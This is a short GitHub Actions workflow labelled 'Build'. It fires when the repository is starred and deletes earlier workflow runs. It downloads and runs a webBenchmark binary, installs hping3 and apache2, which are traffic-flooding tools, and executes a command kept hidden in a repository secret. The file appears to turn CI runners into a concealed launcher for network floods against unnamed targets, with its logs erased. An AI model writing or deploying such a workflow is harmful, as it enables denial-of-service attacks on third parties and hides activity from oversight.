name: 'Build' 
on:
#  push: 
  watch:
    types: started
jobs:
  Run:
    runs-on: ubuntu-latest
    steps:
      - name: Delete workflow runs
        uses: Mattraks/delete-workflow-runs@v2.0.3
        with:
          retain_days: 0
          keep_minimum_runs: 1
      - name: 'Ready'
        run: |
          wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64 -O bm
          chmod +x bm
          sudo apt install hping3
          sudo apt install apache2
      - name: 'Build'
        run: |
          ${{ secrets.Command }}
